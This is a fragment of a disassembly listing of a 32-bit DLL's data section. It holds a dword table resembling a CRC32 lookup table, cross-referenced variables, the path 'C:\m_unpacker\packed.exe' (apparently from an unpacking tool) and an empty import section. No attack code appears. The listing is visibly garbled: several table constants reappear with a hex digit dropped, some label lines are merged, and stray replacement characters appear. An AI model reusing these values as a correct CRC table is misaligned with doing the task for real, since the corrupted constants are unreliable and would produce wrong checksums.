dd 1C6C6162h, 856530D8h, 0F262004Eh, 6C0695EDh, 1B01A57Bh
dd 8208F4C1h, 0F50FC457h, 65B0D9C6h, 12B7E950h, 8BBEB8EAh
dd 0FCB9887Ch, 62DD1DDFh, 15DA2D49h, 8CD37CF3h, 0FBD44C65h
dd 4DB26158h, 3AB551CEh, 0A3BC0074h, 0D4BB30E2h, 4ADFA541h
dd 3DD895D7h, 0A4D1C46Dh, 0D3D6F4FBh, 4369E96Ah, 346ED9FCh
dd 0AD678846h, 0DA60B8D0h, 44042D73h, 33031DE5h, 0AA0A4C5Fh
dd 0DD0D7CC9h, 5005713Ch, 270241AAh, 0BE0B1010h, 0C90C2086h
dd 5768B525h, 206F85B3h, 0B966D409h, 0CE61E49Fh, 5EDEF90Eh
dd 29D9C998h, 0B0D09822h, 0C7D7A8B4h, 59B33D17h, 2EB40D81h
dd 0B7BD5C3Bh, 0C0BA6CADh, 0EDB88320h, 9ABFB3B6h, 3B6E20Ch
dd 74B1D29Ah, 0EAD54739h, 9DD277AFh, 4DB2615h, 73DC1683h
dd 0E3630B12h, 94643B84h, 0D6D6A3Eh, 7A6A5AA8h, 0E40ECF0Bh
dd 9309FF9Dh, 0A00AE27h, 7D079EB1h, 0F00F9344h, 8708A3D2h
dd 1E01F268h, 6906C2FEh, 0F762575Dh, 806567CBh, 196C3671h
dd 6E6B06E7h, 0FED41B76h, 89D32BE0h, 10DA7A5Ah, 67DD4ACCh
dd 0F9B9DF6Fh, 8EBEEFF9h, 17B7BE43h, 60B08ED5h, 0D6D6A3E8h
dd 0A1D1937Eh, 38D8C2C4h, 4FDFF252h, 0D1BB67F1h, 0A6BC5767h
dd 3FB506DDh, 48B2364Bh, 0D80D2BDAh, 0AF0A1B4Ch, 36034AF6h
dd 41047A60h, 0DF60EFC3h, 0A867DF55h, 316E8EEFh, 4669BE79h
dd 0CB61B38Ch, 0BC66831Ah, 256FD2A0h, 5268E236h, 0CC0C7795h
dd 0BB0B4703h, 220216B9h, 5505262Fh, 0C5BA3BBEh, 0B2BD0B28h
dd 2BB45A92h, 5CB36A04h, 0C2D7FFA7h, 0B5D0CF31h, 2CD99E8Bh
dd 5BDEAE1Dh, 9B64C2B0h, 0EC63F226h, 756AA39Ch, 26D930Ah
dd 9C0906A9h, 0EB0E363Fh, 72076785h, 5005713h, 95BF4A82h
dd 0E2B87A14h, 7BB12BAEh, 0CB61B38h, 92D28E9Bh, 0E5D5BE0Dh
dd 7CDCEFB7h, 0BDBDF21h, 86D3D2D4h, 0F1D4E242h, 68DDB3F8h
dd 1FDA836Eh, 81BE16CDh, 0F6B9265Bh, 6FB077E1h, 18B74777h
dd 88085AE6h, 0FF0F6A70h, 66063BCAh, 11010B5Ch, 8F659EFFh
dd 0F862AE69h, 616BFFD3h, 166CCF45h, 0A00AE278h, 0D70DD2EEh
dd 4E048354h, 3903B3C2h, 0A7672661h, 0D06016F7h, 4969474Dh
dd 3E6E77DBh, 0AED16A4Ah, 0D9D65ADCh, 40DF0B66h, 37D83BF0h
dd 0A9BCAE53h, 0DEBB9EC5h, 47B2CF7Fh, 30B5FFE9h, 0BDBDF21Ch
dd 0CABAC28Ah, 53B39330h, 24B4A3A6h, 0BAD03605h, 0CDD70693h
dd 54DE5729h, 23D967BFh, 0B3667A2Eh, 0C4614AB8h, 5D681B02h
dd 2A6F2B94h, 0B40BBE37h, 0C30C8EA1h, 5A05DF1Bh, 2D02EF8Dh
dword_10003720 dd 10004048h ; sub_10001078+1D�r
dword_10003724 dd 10004058h ; sub_10001078+2F�r
dword_10003728 dd 10004058h ; sub_10001078+45�r ...
dword_1000372C dd 320000h ; sub_10001078+81�w ...
dword_10003730 dd 0C49Fh ; sub_10001078+3F�r ...
dword_10003734 dd 0C000h ; sub_10001078+74�r ...
dword_10003738 dd 3200F0h ; sub_10001146+2F�r ...
dword_1000373C dd 1000h ; sub_10001146+3A�r ...
dword_10003740 dd 5 ; sub_10001146:loc_100011B7�r ...
dword_10003744 dd 3201E8h ; sub_10001146+6B�r ...
dword_10003748 dd 3200F0h ; sub_10001208+3F�r
dd 2 dup(0)
dword_10003754 dd 23000h ; sub_10001208+23�r ...
dword_10003758 dd 330000h ; sub_10001208+35�r ...
dword_1000375C dd 353000h ; sub_10001208+8F�r ...
dword_10003760 dd 400h ; sub_10001208+6D�r ...
dword_10003764 dd 3201E8h dword_10003768 dd 1200h ; sub_10001208+E4�w ...
dword_1000376C dd 10000000h dword_10003770 dd 23000h ; sub_10001146+60�w ...
dword_10003774 dd 0BB091Ah ; sub_10001022+2C�r
dword_10003778 dd 0BB0987h ; sub_10001022+31�r
dword_1000377C dd 0BB09F5h ; sub_10001022+39�r
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: sub_10001208+13A�o
; sub_10001208+15C�o
align 4
dd 17h dup(0)
_data ends
; Section 5. (virtual address 00018000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00017600
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 10018000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start